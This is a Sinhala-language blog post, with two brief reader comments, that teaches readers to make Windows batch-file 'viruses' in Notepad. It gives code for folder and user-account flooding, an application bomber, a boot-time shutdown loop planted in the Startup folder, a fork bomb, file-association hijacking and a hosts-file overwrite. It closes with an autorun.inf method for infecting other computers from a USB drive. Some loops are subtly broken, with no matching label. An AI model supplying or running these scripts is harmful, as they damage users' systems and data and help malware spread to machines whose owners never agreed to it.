Notepad භාවිතා කර Virus හදමු.
මම අද කියල දෙන්න හදන්නෙ notepad භාවිතා කර virus හදන හැටි.මුලින්ම notepad කරගන්න ඕනෙ.මේ මම දෙන හැම code එකක්ම save කරනකොට.batකියල save කරන්න මතකතියාගන්න.
සැයු:- මෙම code අත්හදා බැලීමෙන් ඔබේ පරිගණකයට සිදුවන හානිය පිළිබඳව DanumaLK අප වගකියනු නොලැබේ.
1)Folder flooder
@echo off
md %random%
goto x
මේ code එකෙන් වෙන්නේ විශාල folders ප්‍රමාණයක් එකවර නිර්ණය කිරීමයි.මේ codeඑකෙන් පුලුවන් c drive එක හරි වෙනත් drive එකක් හරි තත්පරගානකින් foldersවලින් පුරවන්න.
2)User account flooder
@echo off
net user %random%
goto x
මෙ code එකෙන් පුලුවන් folders වෙනුවට user accounts විශාල ප්‍රමාණයක් එකවර නිර්මාණය කරන්න.
3)Application Bomber
@echo off
start control
start mspaint
start notepad
start write
start cmd
start winword
start explorer
start calc
goto x
windows applications කීපයක් එකවර open වීම සහ එය නැවත සිදුවීමයි මේ code එකෙන් වෙන්නේ. මේ නිසා පරිඝණකයේ speed එක අඩු වීමක් සිදුවේ.
4)Shutdown Virus
copy test1.bat “C:\Users\sys\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup”
shutdown -s -t 00
(test1 කියන තැනට ඔයාල bat file එක save කරපු නම )
මේ code එකෙන් වෙන්නෙ පරිඝණකය boot කරන සෑම අවස්තාවකම මෙම batch file එක ක්‍රිරියාත්මක වී පරගණකය shutdown වීමයි.මේක නැවැත්වීමට නම් windows safemode හරහා පරිගණකය boot කර Startup folder එකේ තියන batch file එක delete කරන්න ඕනෙ.
5)Fork Bomb
%0|%0
විශාල process ප්‍රමාණයක් එකවර ක්‍රියාත්මක වීමයි මේ code එකෙන්වෙන්නෙ.
6)Deleting boot files
attrib -S -R -H C:\ntldr
(මේ code එක windows xp සදහා)
7)Extension Changer
@echo off
assoc .txt=test
assoc .exe=test
assoc .jpeg=test
assoc .png=test
assoc .mpeg=test
මේ code එකෙන් වෙන්නෙ පරිඝණකයේ තියන සෑම file type එකක්ම(exe .txt .jpeg .png .mpeg ) වෙනස් කරන එකයි.මේ batch file එක ක්‍රිරියාත්මක කලොත් files open කරන එකනම් ලේසි වෙන්නේ නෑ.
8) DNS Poisoning
@echo off
echo xxx.xxx.xxx.xxx http://www.test.com > C:\windows\system32\drivers\etc\hosts
(‘xxx.xxx.xxx.xxx’ IP address එකත්, ‘www.test.com’ මෙතනට කැමති web address එකක් දෙන්න.)
**************************
මේ හැම virus එකක්ම pen drive එකකට දාල අනිත් computers වලට ආසාධනය කරන්න පුලුවන්.
[autorun]
open=test.bat
Icon=test.ico
මේක save කරනකොට ‘autorun.inf’ කියල save කරන්න ’test’ කියන තැනට batch virus එකේ නම. ඊට පස්සේ මේ ‘autorun.inf’ එකයි ඔයාගේ virus එකයි pendrive එකට දාන්න. දැන් pendrive එක windows පරිඝණකයකට සම්බන්ද කරපු ගමන් වැඩේ ගොඩ.
👍👍👍👍👍
ReplyDeleteTnx
ReplyDelete